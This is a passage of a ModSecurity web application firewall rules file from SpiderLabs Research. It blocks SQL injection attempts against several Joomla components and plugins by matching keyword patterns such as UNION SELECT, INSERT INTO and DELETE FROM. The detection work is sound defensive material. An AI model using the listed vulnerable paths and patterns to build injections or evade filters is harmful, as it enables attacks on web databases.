"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005296,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005297) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005297,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005298) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005298,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005299) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005299,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005300) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005300,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005301) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005301,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005302) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id ASCII SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005302,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005303) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005303,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005390,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005391,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005802,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005392) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005392,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005394) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005394,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005395,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005396,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005397,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005398) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005398,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005399) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005399,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005400) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005400,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005401) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005401,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005402) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005402,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005404) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005404,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005405) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005405,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005406) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005406,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005409) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UNION SELECT SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005409,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005410) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005410,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php DELETE SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005411,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005412) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005412,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005413,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 